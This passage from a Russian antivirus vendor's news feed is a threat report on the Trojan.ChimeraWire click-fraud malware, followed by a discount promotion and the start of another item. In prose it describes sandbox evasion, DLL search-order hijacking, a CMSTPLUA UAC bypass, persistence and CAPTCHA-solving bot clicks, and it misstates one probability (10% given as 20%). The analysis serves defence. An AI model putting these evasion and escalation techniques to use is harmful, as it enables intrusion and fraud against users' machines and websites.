&lt;p&gt;Первая цепочка начинается с трояна &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.54600&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;. Он проверяет, не работает ли в искусственной среде, и завершает работу, если обнаруживает признаки виртуальной машины или режима отладки. Если таких признаков нет, троян скачивает с C2-сервера ZIP-архив &lt;span class="string"&gt;python3.zip&lt;/span&gt;. В нем находится вредоносный Python-скрипт &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;, а также необходимые для его работы вспомогательные файлы — в частности, вредоносная библиотека &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt; (&lt;a href="https://vms.drweb.ru/search/?q=Trojan.Starter.8377&amp;lng=ru"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;). &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.54600&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt; распаковывает архив и запускает скрипт. Тот является второй ступенью заражения и представляет собой загрузчик, который скачивает с C2-сервера следующую стадию.&lt;/p&gt;

&lt;p&gt;Поведение &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; зависит от того, какими правами он обладает при запуске. Если скрипт запущен без прав администратора, он пытается их получить. Для этого извлеченный вместе с ним &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Starter.8377&amp;lng=ru"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; копируется в каталог &lt;span class="string"&gt;%LOCALAPPDATA%\Microsoft\WindowsApps&lt;/span&gt;. Кроме того, создается скрипт &lt;span class="string"&gt;runs.vbs&lt;/span&gt;, который в дальнейшем будет использован для повторного запуска &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Далее &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; запускает системное приложение &lt;span class="string"&gt;%SystemRoot%\SysWOW64\iscsicpl.exe&lt;/span&gt;. Из-за наличия в нем уязвимости класса DLL Search Order Hijacking оно автоматически загружает троянскую библиотеку &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt;, имя которой совпадает с именем легитимного компонента ОС Windows.&lt;/p&gt;

&lt;p&gt;В свою очередь, &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Starter.8377&amp;lng=ru"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; запускает VBS-скрипт &lt;span class="string"&gt;runs.vbs&lt;/span&gt;, и тот повторно исполняет &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; — уже с правами администратора.&lt;/p&gt;

&lt;p&gt;При запуске с необходимыми привилегиями &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; скачивает с C2-сервера защищенный паролем архив &lt;span class="string"&gt;onedrive.zip&lt;/span&gt;. В нем находится следующая стадия заражения — вредоносная программа &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.54318&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; в виде библиотеки с именем &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt; — и необходимые для ее работы вспомогательные файлы (например, легитимное приложение &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; из ОС Windows с действительной цифровой подписью, относящееся к ПО OneDrive).&lt;/p&gt;

&lt;p&gt;После распаковки архива &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; создает задачу в системном планировщике на запуск программы &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; при старте системы. Далее он запускает это приложение. Из-за наличия в нем уязвимости DLL Search Order Hijacking оно автоматически загружает вредоносную библиотеку &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;, имя которой совпадает с именем компонента ПО OneDrive.&lt;/p&gt;

&lt;p&gt;Получив управление, &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.54318&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; проверяет, не работает ли он в искусственной среде. При обнаружении одного из признаков работы в виртуальной машине или в режиме отладки он прекращает работу.&lt;/p&gt;

&lt;p&gt;Если такие признаки не обнаруживаются, троянская библиотека пытается скачать с C2-сервера полезную нагрузку, а также ключи шифрования для ее расшифровки.&lt;/p&gt;

&lt;p&gt;Расшифрованная полезная нагрузка представляет собой ZLIB-контейнер, внутри которого находится шеллкод и исполняемый файл. После расшифровки контейнера &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.54318&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; пытается распаковать его. Если это не удается, то троян самоудаляется, а сам процесс завершает работу. В случае успеха управление передается шеллкоду, задача которого — разжать идущий вместе с ним исполняемый файл. Данный файл является последней стадией заражения — целевым трояном &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Вторая цепочка заражения&lt;/h3&gt;

&lt;p&gt;Вторая цепочка начинается с вредоносной программы &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;. При запуске она проверяет наличие прав администратора и при их отсутствии пытается их получить. Троян использует технику Masquerade PEB для обхода системы защиты, маскируясь под легитимный процесс &lt;span class="string"&gt;explorer.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Затем он вносит патч в копию системной библиотеки &lt;span class="string"&gt;%SystemRoot%\System32\ATL.dll&lt;/span&gt;. Для этого &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; считывает ее содержимое, добавляет в нее расшифрованный байт-код и путь до своего файла, после чего сохраняет модифицированную версию в виде файла &lt;span class="string"&gt;dropper&lt;/span&gt; в той же директории, где он расположен. Далее троян инициализирует объекты COM-модели оболочки Windows для сервиса &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; и измененной библиотеки. Если инициализация проходит успешно, &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; пытается получить права администратора через использование COM-интерфейса CMSTPLUA, эксплуатируя уязвимость, характерную для некоторых старых COM-интерфейсов.&lt;/p&gt;

&lt;p&gt;В случае успеха модифицированная библиотека &lt;span class="string"&gt;dropper&lt;/span&gt; копируется в каталог &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; в виде файла &lt;span class="string"&gt;ATL.dll&lt;/span&gt;. После этого &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; запускает системную оснастку управления WMI &lt;span class="string"&gt;WmiMgmt.msc&lt;/span&gt;. В результате происходит эксплуатация уязвимости DLL Search Order Hijacking в системном приложении &lt;span class="string"&gt;mmc.exe&lt;/span&gt;, которое автоматически загружает библиотеку &lt;span class="string"&gt;%SystemRoot%\System32\wbem\ATL.dll&lt;/span&gt; с патчем. Она, в свою очередь, повторно запускает &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;, но уже с правами администратора.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_ru.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Схема работы &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; при отсутствии прав администратора&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;При запуске от имени администратора &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; исполняет несколько PowerShell-скриптов для скачивания полезной нагрузки с C2-сервера. Одним из загружаемых объектов является ZIP-архив &lt;span class="string"&gt;one.zip&lt;/span&gt;. В нем находятся файлы, аналогичные файлам из архива &lt;span class="string"&gt;onedrive.zip&lt;/span&gt; из первой цепочки (в частности, легитимная программа &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; и вредоносная библиотека &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt; — &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.54318&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; распаковывает архив и в системном планировщике создает задачу на автозапуск &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; при загрузке системы. Троян также непосредственно запускает это приложение. Так же, как и в первой цепочке, при запуске в &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; происходит эксплуатация уязвимости DLL Search Order Hijacking и автоматическая загрузка троянской библиотеки &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;. Далее цепочка заражения повторяет первый сценарий.&lt;/p&gt;

&lt;p&gt;При этом &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; скачивает и второй ZIP-архив: &lt;span class="string"&gt;two.zip&lt;/span&gt;. В нем находится вредоносный скрипт &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; (&lt;span class="string"&gt;update.py&lt;/span&gt;), а также файлы, необходимые для его запуска. Среди них — &lt;span class="string"&gt;Guardian.exe&lt;/span&gt; — переименованный консольный интерпретатор языка Python &lt;span class="string"&gt;pythonw.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;После распаковки архива &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; создает в системном планировщике задачу на автозапуск &lt;span class="string"&gt;Guardian.exe&lt;/span&gt; при загрузке системы. Кроме того, он непосредственно исполняет через это приложение вредоносный скрипт &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Частично дублируя первую цепочку заражения, злоумышленники, по всей видимости, стремились повысить вероятность успешной загрузки &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; в целевые системы.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_ru.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Схема работы &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; с правами администратора&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Trojan.ChimeraWire&lt;/h3&gt;

&lt;blockquote&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; получил свое имя на основе сочетания слов «chimera» (в переводе с англ. «химера» — мифическое существо с частями тел нескольких животных) и «wire» (в переводе с англ. «провод»). Слово «chimera» описывает гибридную природу применяемых злоумышленниками методик: использование троянов-загрузчиков, написанных на разных языках, а также антиотладочные техники и эскалация привилегий в процессе заражения. Кроме того, оно отражает то, что троян представляет собой комбинацию различных фреймворков, плагинов и легального ПО, через которое осуществляется скрытое управление трафиком. Отсюда вытекает второе слово «wire»: оно отсылает к невидимой и вредоносной работе трояна с сетью.&lt;/blockquote&gt;

&lt;p&gt;Попадая на целевой компьютер, &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; скачивает со стороннего сайта ZIP-архив &lt;span class="string"&gt;chrome-win.zip&lt;/span&gt; с браузером Google Chrome для ОС Windows. Отметим, что на этом ресурсе также хранятся архивы со сборками Google Chrome и для других систем, таких как Linux и macOS — в том числе для различных аппаратных платформ.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/04_chrome_download.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/04_chrome_download.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт с различными сборками браузера Google Chrome, откуда троян загружает необходимый архив&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После скачивания браузера &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; пытается незаметно установить в него расширения NopeCHA и Buster, предназначенные для автоматизированного распознавания капчи (CAPTCHA). Данные расширения будут в дальнейшем использоваться трояном в процессе его работы.&lt;/p&gt;

&lt;p&gt;Далее он запускает браузер в режиме отладки без видимого окна, что позволяет выполнять вредоносную деятельность, не привлекая внимания пользователя. После этого происходит подключение к выбранному автоматически порту отладки по протоколу WebSocket.&lt;/p&gt;

&lt;p&gt;Вслед за этим троян переходит к получению заданий. Он отправляет запрос на C2-сервер и получает в ответ base64-строку, в которой скрыта зашифрованная алгоритмом AES-GCM конфигурация в формате JSON.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/05_config.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/05_config.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример конфигурации, которую трояну передает C2-сервер&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В ней находятся задания и связанные с ними параметры:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;целевая поисковая система (поддерживаются системы Google и Bing);&lt;/li&gt;
    &lt;li&gt;ключевые фразы для поиска сайтов в заданной поисковой системе и их последующего открытия;&lt;/li&gt;
    &lt;li&gt;максимальное количество последовательных переходов по веб-страницам;&lt;/li&gt;
    &lt;li&gt;случайные распределения для выполнения автоматических кликов на веб-страницах;&lt;/li&gt;
    &lt;li&gt;время ожидания загрузки страниц;&lt;/li&gt;
    &lt;li&gt;целевые домены.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Для дополнительной имитации деятельности реального человека и обхода систем, отслеживающих постоянную активность, в конфигурации также предусмотрены параметры, отвечающие за паузы между сессиями работы.&lt;/p&gt;

&lt;h3&gt;Имитация кликов мышью пользователем&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; способен выполнять клики следующих видов:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;для навигации по поисковой выдаче;&lt;/li&gt;
    &lt;li&gt;для открытия найденных релевантных ссылок в новых фоновых вкладках.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Вначале &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; через нужную поисковую систему выполняет поиск сайтов по доменам и ключевым фразам, указанным в конфигурации. Далее он открывает полученные в поисковой выдаче сайты и находит на них все HTML-элементы, которые определяют гиперссылки. Троян помещает их в массив данных и перемешивает его, чтобы объекты в нем располагались в последовательности, отличной от последовательности на веб-странице. Это делается для обхода антибот-защиты сайтов, которая может отслеживать порядок нажатий.&lt;/p&gt;

&lt;p&gt;Затем &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; проверяет, работоспособны ли найденные ссылки и совпадают ли строки в них с заданным шаблоном из конфигурации, после чего подсчитывает общее количество совпадений. Дальнейшие действия трояна зависят от получившегося числа.&lt;/p&gt;

&lt;p&gt;Если на странице было выявлено достаточное количество подходящих ссылок, &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; сканирует страницу и сортирует найденные ссылки по релевантности (наиболее соответствующие ключевым словам ссылки идут первыми). После этого выполняется клик по одной или нескольким подходящим ссылкам.&lt;/p&gt;

&lt;p&gt;Если же совпадений с заданным шаблоном недостаточно или их нет вовсе, вредоносная программа использует алгоритм с вероятностной моделью поведения, который максимально имитирует действия настоящего пользователя. На основе параметров из конфигурации при помощи взвешенного случайного распределения &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; определяет количество ссылок, по которым необходимо перейти. Например, распределение &lt;span class="string"&gt;["1:90", "2:10"]&lt;/span&gt; означает, что &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; кликнет 1 ссылку с вероятностью 90%, и 2 ссылки — с вероятностью 20%. Таким образом, с большой долей вероятности вредоносная программа должна перейти по одной ссылке. Троян случайным образом выбирает ссылку из составленного ранее массива и выполняет клик.&lt;/p&gt;

&lt;p&gt;После каждого перехода по ссылке из поисковой выдачи и выполнения кликов на загружаемой странице троян, в зависимости от задачи, возвращается на предыдущую вкладку или переходит к следующей. Алгоритм действий повторяется до тех пор, пока не будет исчерпан лимит по кликам для целевых веб-сайтов.&lt;/p&gt;

&lt;p&gt;Ниже представлены примеры сайтов, параметры для взаимодействия с которыми поступали трояну в заданиях от C2-сервера:&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/06_website.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/06_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/07_website.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/07_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/08_website.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/08_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Подробные технические описания трояна &lt;b&gt;ChimeraWire&lt;/b&gt; и вредоносных программ, участвующих в его загрузке, находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».&lt;/p&gt;

&lt;p&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.54600&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Starter.8377&amp;lng=ru"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Python.Downloader.208&amp;lng=ru"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.54318&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    Подробнее о &lt;a href="https://vms.drweb.ru/search/?q=Trojan.DownLoader48.61444&amp;lng=ru"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; 
&lt;/p&gt;

&lt;h3&gt;Заключение&lt;/h3&gt;

&lt;p&gt;В настоящее время вредоносная деятельность &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; фактически сводится к выполнению относительно простых задач кликера по накрутке популярности веб-сайтов. Вместе с тем, функциональные возможности лежащих в его основе утилит позволяют трояну решать более широкий спектр задач — в том числе совершать автоматизированные действия под видом активности настоящих пользователей. Так, с его помощью злоумышленники могут заполнять веб-формы — например, на сайтах, проводящих опросы в рекламных целях. Кроме того, они могут использовать его для считывания содержимого веб-страниц и создания их скриншотов — как с целью кибершпионажа, так и для автоматического сбора информации для наполнения различных баз данных (например, с почтовыми адресами, номерами телефонов и т. п.).&lt;/p&gt;

&lt;p&gt;Таким образом, в будущем возможно появление новых версий &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, где эти и другие функции будут реализованы в полной мере. Специалисты компании «Доктор Веб» продолжают следить за развитием этого трояна.&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;CK®&lt;/h3&gt;

&lt;p&gt;Мы проанализировали &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire.2&amp;lng=ru" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; по фреймворку MITRE ATT&amp;CK®, который представляет собой матрицу с описанием тактик и техник киберпреступников, атакующих информационные системы. В результате были выявлены следующие ключевые техники:&lt;/p&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Этап&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Техника&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Выполнение&lt;/td&gt;
            &lt;td&gt;Выполнение с участием пользователя (T1204)&lt;br /&gt;&lt;br /&gt;Вредоносный файл (T1204.002)&lt;br /&gt;&lt;br /&gt;Вредоносная библиотека (T1204.005)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Командная оболочка Windows (T1059.003)&lt;br /&gt;&lt;br /&gt;Visual Basic (T1059.005)&lt;br /&gt;&lt;br /&gt;Python (T1059.006)&lt;br /&gt;&lt;br /&gt;Планировщик заданий Windows (T1053.005)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Закрепление&lt;/td&gt;
            &lt;td&gt;Ключи запуска в реестре Windows / Каталог автозагрузки (T1547.001)&lt;br /&gt;&lt;br /&gt;Запланированная задача / задание (T1053)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Повышение привилегий&lt;/td&gt;
            &lt;td&gt;Перехват потока исполнения: перехват поиска DLL (T1574.001)&lt;br /&gt;&lt;br /&gt;Обход контроля учетных записей (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Предотвращение обнаружения&lt;/td&gt;
            &lt;td&gt;Зашифрованный / закодированный файл (T1027.013)&lt;br /&gt;&lt;br /&gt;Уклонение от отладки (T1622)&lt;br /&gt;&lt;br /&gt;Скрытое окно (T1564.003)&lt;br /&gt;&lt;br /&gt;Исключения для файла или пути (T1564.012)&lt;br /&gt;&lt;br /&gt;Деобфускация / декодирование файлов или данных (T1140)&lt;br /&gt;&lt;br /&gt;Перехват потока исполнения: перехват поиска DLL (T1574.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Организация управления&lt;/td&gt;
            &lt;td&gt;Двусторонняя связь (T1102.002)&lt;br /&gt;&lt;br /&gt;Веб-протоколы (T1071.001)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Trojan.ChimeraWire/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15087&amp;lng=ru</guid><title>Черная пятница: скидка 40% на комплексную защиту Dr.Web</title><link>https://news.drweb.ru/show/?i=15087&amp;lng=ru&amp;c=5</link><pubDate>Wed, 26 Nov 2025 03:34:15 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;С 26 ноября по 3 декабря 2025 года вы можете приобрести антивирусную защиту для компьютеров и мобильных устройств со скидкой 40%.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Сезон распродаж — время не только выгодных покупок, но и активности киберпреступников. В этот период растет число фишинговых атак, вредоносных приложений и попыток кражи платежных данных.&lt;br&gt;Решения Dr.Web помогут вам оставаться в безопасности!&lt;/p&gt;&lt;h3&gt;Акция распространяется на:&lt;/h3&gt;&lt;p&gt;&lt;strong&gt;Dr.Web Security Space — защита персональных компьютеров&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;блокирует вредоносные программы и шпионское ПО&lt;/li&gt;&lt;li&gt;защищает онлайн‑платежи и конфиденциальные данные&lt;/li&gt;&lt;li&gt;фильтрует фишинговые письма и предупреждает о мошеннических сайтах&lt;/li&gt;&lt;li&gt;не замедляет работу устройств&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;Dr.Web Security Space для мобильных устройств — защита мобильных устройств, планшетов, Smart TV и игровых консолей&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;непрерывно защищает от всех типов вредоносных программ&lt;/li&gt;&lt;li&gt;блокирует нежелательные звонки и СМС-спам&lt;/li&gt;&lt;li&gt;обеспечивает безопасность персональных данных, банковских операций и онлайн-покупок&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Срок проведения акции: 26 ноября — 3 декабря 2025 года&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15084&amp;lng=ru</guid><title>Dr.Web CureIt! теперь видит то, что пытается скрыть вредоносное программное обеспечение</title><link>https://news.drweb.ru/show/?i=15084&amp;lng=ru&amp;c=5</link><pubDate>Thu, 20 Nov 2025 07:40:49 